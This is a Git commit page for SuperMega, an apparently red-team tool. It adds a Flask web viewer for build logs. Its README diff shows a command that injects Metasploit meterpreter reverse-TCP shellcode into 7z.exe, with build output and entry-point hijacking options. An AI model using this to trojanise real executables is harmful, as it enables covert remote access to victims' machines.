admin/SuperMega
1
0
Fork 0
mirror of https://github.com/dobin/SuperMega synced 2026-06-02 17:27:10 +00:00
Code Issues Packages Projects Releases Wiki Activity

feature: web server

Browse Source
This commit is contained in:
Dobin
2024-02-17 11:17:40 +00:00
parent fd9dc68eea
commit c215ae62f3
14 changed files with 3592 additions and 1 deletions
Download Patch File Download Diff File Expand all files Collapse all files
README.md
+47
View File
@@ -39,6 +39,53 @@ Plugins:
* APPEND
## Examples
### Metasploit in 7z
Inject metasploit into 7z.exe. It will use PEB_WALK.
```
PS C:\repos\supermega> python.exe .\supermega.py --shellcode .\shellcodes\msf-meterpreter-reversetcp.bin --inject .\exes\7z.exe
(supermega.py) Super Mega
(helper.py ) --[ Remove old files ]
(model.py ) --( Capabilities:
(model.py ) 0x0: GetEnvironmentVariableW (b'')
(model.py ) 0x460090: VirtualAlloc (b'')
(supermega.py) --[ SourceStyle: peb_walk
(compiler.py ) --[ C to ASM: build\main.c -> build\main.asm ]
(compiler.py ) ---[ Make ASM from C: build\main.c ]
(compiler.py ) ---[ Fixup : build\main.asm ]
(compiler.py ) > Replace external reference at line: 8
(compiler.py ) > Replace external reference at line: 395
(compiler.py ) > Replace payload length at line: 389
(compiler.py ) > Add end of code label at line: 807
(compiler.py ) ---[ Cleanup: build\main.asm ]
(assembler.py) --[ Assemble to exe: build\main.asm -> build\main.exe -> build\main.bin ]
(assembler.py) ---[ Assemble ASM to EXE: build\main.asm -> build\main.exe ]
(assembler.py) ---[ EXE to SHC: build\main.exe -> build\main.bin ]
(helper.py ) --[ Code section: .text
(helper.py ) > 0x1000 Code Size: 2557 (raw code section size: 2560)
(assembler.py) --[ Merge stager: build\main.bin + .\shellcodes\msf-meterpreter-reversetcp.bin -> build\main.bin ]
(assembler.py) ---[ Size: Stager: 2557 and Payload: 449 Sum: 3006 ]
(injector.py ) --[ Injecting: build\main.bin into: .\exes\7z.exe -> .\exes\7z.infected.exe ]
(supermega.py) --[ Start infected exe ]
```
## rbmode
```
save,run
| |
| +---------- 1 - change AddressOfEntryPoint
| 2 - hijack branching instruction at Original Entry Point (jmp, call, ...)
| 3 - setup TLS callback
| 4 - hijack branching instruction at DLL Exported function (use -e to specify export to hook)
|
+-------------- 1 - store shellcode in the middle of a code section
2 - append shellcode to the PE file in a new PE section
```
## Directories
* `shellcodes/`: Input: Shellcodes we want to use as input (payload)
app/static/ansi.css
+1103
View File
File diff suppressed because it is too large Load Diff
app/static/bootstrap-icons.css
Vendored
+2078
View File
File diff suppressed because it is too large Load Diff
app/static/bootstrap.bundle.min.js
Vendored
+7
View File
File diff suppressed because one or more lines are too long
app/static/bootstrap.min.css
Vendored
+7
View File
File diff suppressed because one or more lines are too long
app/static/pygments-styles.css
+75
View File
@@ -0,0 +1,75 @@
pre { line-height: 125%; }
td.linenos .normal { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }
span.linenos { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }
td.linenos .special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }
span.linenos.special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }
.highlight .hll { background-color: #ffffcc }
.highlight { background: #f8f8f8; }
.highlight .c { color: #3D7B7B; font-style: italic } /* Comment */
.highlight .err { border: 1px solid #FF0000 } /* Error */
.highlight .k { color: #008000; font-weight: bold } /* Keyword */
.highlight .o { color: #666666 } /* Operator */
.highlight .ch { color: #3D7B7B; font-style: italic } /* Comment.Hashbang */
.highlight .cm { color: #3D7B7B; font-style: italic } /* Comment.Multiline */
.highlight .cp { color: #9C6500 } /* Comment.Preproc */
.highlight .cpf { color: #3D7B7B; font-style: italic } /* Comment.PreprocFile */
.highlight .c1 { color: #3D7B7B; font-style: italic } /* Comment.Single */
.highlight .cs { color: #3D7B7B; font-style: italic } /* Comment.Special */
.highlight .gd { color: #A00000 } /* Generic.Deleted */
.highlight .ge { font-style: italic } /* Generic.Emph */
.highlight .ges { font-weight: bold; font-style: italic } /* Generic.EmphStrong */
.highlight .gr { color: #E40000 } /* Generic.Error */
.highlight .gh { color: #000080; font-weight: bold } /* Generic.Heading */
.highlight .gi { color: #008400 } /* Generic.Inserted */
.highlight .go { color: #717171 } /* Generic.Output */
.highlight .gp { color: #000080; font-weight: bold } /* Generic.Prompt */
.highlight .gs { font-weight: bold } /* Generic.Strong */
.highlight .gu { color: #800080; font-weight: bold } /* Generic.Subheading */
.highlight .gt { color: #0044DD } /* Generic.Traceback */
.highlight .kc { color: #008000; font-weight: bold } /* Keyword.Constant */
.highlight .kd { color: #008000; font-weight: bold } /* Keyword.Declaration */
.highlight .kn { color: #008000; font-weight: bold } /* Keyword.Namespace */
.highlight .kp { color: #008000 } /* Keyword.Pseudo */
.highlight .kr { color: #008000; font-weight: bold } /* Keyword.Reserved */
.highlight .kt { color: #B00040 } /* Keyword.Type */
.highlight .m { color: #666666 } /* Literal.Number */
.highlight .s { color: #BA2121 } /* Literal.String */
.highlight .na { color: #687822 } /* Name.Attribute */
.highlight .nb { color: #008000 } /* Name.Builtin */
.highlight .nc { color: #0000FF; font-weight: bold } /* Name.Class */
.highlight .no { color: #880000 } /* Name.Constant */
.highlight .nd { color: #AA22FF } /* Name.Decorator */
.highlight .ni { color: #717171; font-weight: bold } /* Name.Entity */
.highlight .ne { color: #CB3F38; font-weight: bold } /* Name.Exception */
.highlight .nf { color: #0000FF } /* Name.Function */
.highlight .nl { color: #767600 } /* Name.Label */
.highlight .nn { color: #0000FF; font-weight: bold } /* Name.Namespace */
.highlight .nt { color: #008000; font-weight: bold } /* Name.Tag */
.highlight .nv { color: #19177C } /* Name.Variable */
.highlight .ow { color: #AA22FF; font-weight: bold } /* Operator.Word */
.highlight .w { color: #bbbbbb } /* Text.Whitespace */
.highlight .mb { color: #666666 } /* Literal.Number.Bin */
.highlight .mf { color: #666666 } /* Literal.Number.Float */
.highlight .mh { color: #666666 } /* Literal.Number.Hex */
.highlight .mi { color: #666666 } /* Literal.Number.Integer */
.highlight .mo { color: #666666 } /* Literal.Number.Oct */
.highlight .sa { color: #BA2121 } /* Literal.String.Affix */
.highlight .sb { color: #BA2121 } /* Literal.String.Backtick */
.highlight .sc { color: #BA2121 } /* Literal.String.Char */
.highlight .dl { color: #BA2121 } /* Literal.String.Delimiter */
.highlight .sd { color: #BA2121; font-style: italic } /* Literal.String.Doc */
.highlight .s2 { color: #BA2121 } /* Literal.String.Double */
.highlight .se { color: #AA5D1F; font-weight: bold } /* Literal.String.Escape */
.highlight .sh { color: #BA2121 } /* Literal.String.Heredoc */
.highlight .si { color: #A45A77; font-weight: bold } /* Literal.String.Interpol */
.highlight .sx { color: #008000 } /* Literal.String.Other */
.highlight .sr { color: #A45A77 } /* Literal.String.Regex */
.highlight .s1 { color: #BA2121 } /* Literal.String.Single */
.highlight .ss { color: #19177C } /* Literal.String.Symbol */
.highlight .bp { color: #008000 } /* Name.Builtin.Pseudo */
.highlight .fm { color: #0000FF } /* Name.Function.Magic */
.highlight .vc { color: #19177C } /* Name.Variable.Class */
.highlight .vg { color: #19177C } /* Name.Variable.Global */
.highlight .vi { color: #19177C } /* Name.Variable.Instance */
.highlight .vm { color: #19177C } /* Name.Variable.Magic */
.highlight .il { color: #666666 } /* Literal.Number.Integer.Long */
app/static/styles.css
+66
View File
@@ -0,0 +1,66 @@
.tablevert td {
border-left: 1px solid rgb(209, 208, 208);
border-right: 1px solid rgb(209, 208, 208);
text-align: center;
}
table.table th {
white-space: nowrap;
}
table.table td {
white-space: nowrap;
}
.fgrey {
color: #b6b6b6;
}
.container {
margin-left: 1em;
margin-right: 1em;
}
.mycode {
margin-top: 0;
margin-bottom: 0;
}
.mycodeline {
display: block;
margin-top: 0;
margin-bottom: 0;
overflow: visible;
font-family: var(--bs-font-monospace);
font-size: 1em;
direction: ltr;
unicode-bidi: bidi-override;
font-family: monospace;
white-space: pre;
}
.indent {
margin-top: 1em;
margin-left: 1em;
}
.matchesview {
padding-left: 4px !important;
padding-right: 4px !important;
}
/* button to the left
https://stackoverflow.com/questions/69833687/how-to-left-align-default-bootstrap-5-accordion-icon
*/
.accordion-button:after {
order: -1;
margin-left: 0;
margin-right:0.5em;
}
.tooltip-inner {
max-width: 40em;
width: 40em;
text-align: left;
}
app/templates/header.html
+9
View File
@@ -0,0 +1,9 @@
<title>SuperMega</title>
<link href="/static/bootstrap.min.css" rel="stylesheet">
<script src="/static/bootstrap.bundle.min.js"></script>
<link rel="stylesheet" href="/static/bootstrap-icons.css">
<link href="/static/styles.css" rel="stylesheet"></link>
<link href="/static/ansi.css" rel="stylesheet"></link>
<link href="/static/pygments-styles.css" rel="stylesheet"></link>
app/templates/index.html
+15
View File
@@ -0,0 +1,15 @@
<!DOCTYPE html>
<html>
<head>
{% include 'header.html' %}
</head>
<body>
{% include 'navigation.html' %}
<div class="indent">
<h1> SuperMega </h1>
</div>
</body>
</html>
app/templates/navigation.html
+22
View File
@@ -0,0 +1,22 @@
<nav class="navbar navbar-expand-lg navbar-dark bg-dark">
<div class="container">
<a class="navbar-brand" href="#!">SuperMega</a>
<button class="navbar-toggler"
type="button"
data-bs-toggle="collapse"
data-bs-target="#navbarSupportedContent"
aria-controls="navbarSupportedContent"
aria-expanded="false"
aria-label="Toggle navigation"
>
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse" id="navbarSupportedContent">
<ul class="navbar-nav mr-auto">
<li class="nav-item"><a class="nav-link {{ 'active' if request.path == '/' else '' }}" href="/">Home</a></li>
</ul>
</div>
</div>
</nav>
app/templates/project.html
+51
View File
@@ -0,0 +1,51 @@
<!DOCTYPE html>
<html>
<head>
{% include 'header.html' %}
</head>
<body>
{% include 'navigation.html' %}
<div class="container-fluid">
<div class="row">
<div class="col-md-2">
<ul class="nav nav-tabs flex-column" id="myTab" role="tablist">
{% for log_file in log_files %}
<li class="nav-item" role="presentation">
<button
class="nav-link"
id="project-{{log_file['id']}}-tab"
data-bs-toggle="tab"
data-bs-target="#project-{{log_file['id']}}"
type="button"
role="tab"
aria-controls="project-{{log_file['id']}}"
aria-selected="true"
>{{log_file['name']}}</button>
</li>
{% endfor %}
</ul>
</div>
<div class="col-md-10">
<div class="tab-content" id="myTabContent">
{% for log_file in log_files %}
<div
class="tab-pane fade"
id="project-{{log_file['id']}}"
role="tabpanel"
aria-labelledby="project-{{log_file['id']}}-tab"
>
{{log_file['content']|safe}}
</div>
{% endfor %}
</div>
</div>
</div>
</div>
</body>
</html>
app/views.py
+77
View File
@@ -0,0 +1,77 @@
from flask import Blueprint, current_app, flash, request, redirect, url_for, render_template, send_file, make_response, session
from werkzeug.utils import secure_filename
import os
import logging
import io
from typing import List, Tuple
from datetime import date
from pygments import highlight
from pygments.lexers import CLexer, NasmLexer, DiffLexer
from pygments.formatters import HtmlFormatter
import difflib
views = Blueprint('views', __name__)
@views.route("/")
def index():
return render_template('index.html')
@views.route("/project")
def project():
# read the content of all files in logs
log_files = []
id = 0
asm_a = "" # for diff
asm_b = ""
for file in os.listdir("logs"):
if file.endswith(".txt"):
print("Handle: ", file)
with open(os.path.join("logs", file), "r") as f:
data = f.read()
if 'main_c' in file:
data = highlight(data, CLexer(), HtmlFormatter(full=False))
elif '_asm' in file:
# handle special cases
if '_orig' in file:
asm_a = data
if '_cleanup' in file:
asm_b = data
data = highlight(data, NasmLexer(), HtmlFormatter(full=False))
entry = {
"name": file,
"id": str(id),
"content": data,
}
log_files.append(entry)
id += 1
# more
if asm_a != "" and asm_b != "":
# do the diff from the content of the two files
a = asm_a.splitlines()
b = asm_b.splitlines()
diff_generator = difflib.unified_diff(a, b, lineterm='')
diff_string = '\n'.join(diff_generator)
diff_l = highlight(diff_string, DiffLexer(), HtmlFormatter(full=False))
entry = {
"name": "_asm_diff".format(),
"id": str(id),
"content": diff_l,
}
log_files.append(entry)
id += 1
asm_a = ""
asm_b = ""
return render_template('project.html',
log_files=log_files
)
requirements.txt
+2 -1
View File
@@ -2,4 +2,5 @@ pytest
pefile
capstone
keystone-engine
jinja2
jinja2
Pygments
web.py
+33
View File
@@ -0,0 +1,33 @@
#!/usr/bin/python3
import os
import argparse
from flask import Flask
from app.views import views
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--listenip', type=str, help='IP to listen on', default="0.0.0.0")
parser.add_argument('--listenport', type=int, help='Port to listen on', default=5001)
parser.add_argument('--debug', action='store_true', help='Debug', default=False)
args = parser.parse_args()
root_folder = os.path.dirname(__file__)
app_folder = os.path.join(root_folder, 'app')
app = Flask(__name__,
static_folder=os.path.join(app_folder, 'static'),
template_folder=os.path.join(app_folder, 'templates')
)
#app.config['UPLOAD_FOLDER'] = os.path.join(app_folder, 'upload')
#app.config['EXAMPLE_FOLDER'] = os.path.join(app_folder, 'examples')
app.config['TEMPLATES_AUTO_RELOAD'] = True
app.config['SECRET_KEY'] = os.urandom(24)
app.config['SESSION_TYPE'] = 'filesystem'
app.config.from_prefixed_env()
app.register_blueprint(views)
app.run(host=args.listenip, port=args.listenport, debug=args.debug)